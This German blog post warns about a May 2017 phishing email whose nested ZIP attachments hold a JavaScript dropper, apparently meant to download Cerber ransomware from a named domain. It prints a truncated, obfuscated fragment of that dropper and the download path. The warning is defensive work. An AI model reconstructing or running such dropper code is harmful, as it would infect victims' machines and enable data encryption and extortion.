14392 (Empfänger), 49797 (Empfänger) von [email protected] oder 18456 (Empfänger) von [email protected]

Am Sonntag, den 14. Mai 2017 (Muttertag) wurde durch unbekannte Dritte die folgende E-Mail versendet. Achtung: Die E-Mail lädt vermutlich den Verschlüsselungs- und Erpressungstrojaner „Cerber“ (Ransomware) nach. Öffnen Sie daher nicht die Anlage!

Betreff: 14392 (Empfänger), 49797 (Empfänger) oder 18456 (Empfänger)

Absender: [email protected] oder [email protected]

Anlage: 72.zip, 179.zip oder 3861.zip

Als Anlage ist ein ZIP-Archiv beigefügt, welches z. B. „72.zip“ (bzw. „179.zip“ oder „3861.zip“) lautet. Darin ist nochmals eine .zip-Datei wie z. B. „6314.zip“ (bzw. „20562.zip“ oder „10547.zip“) enthalten. In diesem zweiten ZIP-Archiv ist dann ein JavaScript „6314.js“ (bzw. „20562.zip“ oder „10547.zip“) enthalten:

lVXajwOLnBGQrqkiAhJ = ‚TnW’+
‚dp’+
‚C’+
‚VqLuWy’+
‚TnWdpCVqL’+
‚ufGrTnWdpCVqLuITnWdpCVqLuznYxTioEKTnWdpCVqLu TnWdpCVqLu= nTnWdpCVqLuewTnWdpCVqLu ATnWd’+
‚pCVqLuctiTnWdpCV’+
‚qLuvTnWdpCVqLueXOTnW’+
‚dpCV’+
‚qLubjTnWdpCVqLu’+
‚eTnWdpCVqLuct’+
‚TnWdpCVqLu(TnWdpCVq’+
‚Lu’+
‚“TnWdpCVqLuS’+
‚TnWdpCVqLuHellTnWdpCVqLu.TnWdp’+
‚CVqLuATnWdpCVqLupTnWd’+
‚pCVqLupTnWdpCVq’+
‚L’+
‚ulTnWdpCVqLuiTnWdpCVqLuCATnWdpCVqLuTITnWdpCVqLuOTn’+
‚WdpCVqLunTnWdpCVqLu“);’+
‚TnWdpCVqLu TnWdpCVqLu’+
‚FTnWdp’+
‚CVqLuWT’+
’nWd’+
‚pCVqLuqn’+
‚TnWdpCVqLuSTnWdpC’+
‚VqLubMsTnWdpCV’+
‚qLuvTnWd’+
‚pCVqLuBT’+
’nWdpCVqLuerTnWdpCVqLuyTn’+

Da soll etwas verborgen werden! Führen Sie das Script daher nicht aus! 

Das Script würde von der Domain qipokacool.top die Datei admin.php?f=404 öffnen. Vermutlich verbirgt sich dahinter die Cerber Ransomware (Verschlüsselungs- und Erpressungstrojaner).

Beim Test hat der Server eine Fehlermeldung zurückgeliefert.

502 Bad Gateway
nginx

Laden Sie nicht die Datei! Aufgrund früherer E-Mails ist davon auszugehen, dass die Cerber Ransomware nachgeladen werden sollte!

Kommentar(e)

Schreibe einen Kommentar

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind mit * markiert.